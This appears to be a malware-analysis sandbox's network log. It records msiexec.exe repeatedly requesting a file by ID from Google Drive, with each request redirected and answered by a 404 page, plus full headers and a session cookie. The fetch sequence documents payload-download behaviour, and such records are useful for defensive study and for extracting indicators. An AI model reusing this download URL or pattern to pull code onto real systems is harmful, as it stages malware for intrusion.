                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:52 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgTN1rVcSYi8FPkd4o5jbhTQyMaGHo5DkWllHrBDAXiGvipyTiOxFPUEEcvSZxp3lm6tuyW5-DM
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:52 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-V2244LTKCvkr3-H0g9eCxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 62 4b 49 6b 77 7a 4a 77 74 2d 38 6a 6b 51 31 58 6e 2d 63 4d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3bKIkwzJwt-8jkQ1Xn-cMw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.949982142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:53 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:54 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:54 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-zkquMcfjZB5PpyvmXRRlGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.949983142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:54 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:55 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC4FkAEpy9cpXTjGevKEliGRmQk6sLx2PvVkXuOonHF_NsHnSELMAjG2IEQdeq3mrv2A
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:55 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-ejR7Zf_6k2X81s4YVks1Bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:55 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 62 6e 45 41 6d 51 79 52 68 4c 4f 6c 51 68 6f 42 67 65 51 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cbnEAmQyRhLOlQhoBgeQLg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.949984142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:56 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:56 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:56 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-skXHX4DevahrePO_Yys1Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.949985142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:57 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:57 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS43oOuhh8VWKFSSsSK-VS4bQuLCawZpz7hbTmVjepChF9GpZzZ-FT1_ZGV61RnXNzJ
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:57 GMT
                                                          Content-Security-Policy: script-src 'nonce-RbIqqbL5A-sM2qw7ErJk9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:57 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 50 4e 36 42 31 75 46 52 68 59 63 55 41 69 42 67 55 5f 57 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4PN6B1uFRhYcUAiBgU_W8g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.949986142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:58 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:58 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:58 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-jm2DD_fLm-7wkm7ZOOBJDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.949987142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:30:59 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:00 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgRi-w3JwOID6ax-YpJ4pSxZDT_qA8ibee2LelrMfP5B3AItsVOVE2eQjQlXrcdvvaOCptnKKok
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:59 GMT
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: script-src 'nonce-eZqXO2lSHEIBW-PRKOYQvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 2d 74 5f 34 6a 37 55 33 45 66 6c 70 41 31 62 37 77 72 31 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="--t_4j7U3EflpA1b7wr1rw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.949988142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:00 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:01 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:01 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-YX3GTvVLUQeFFznO22NExA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
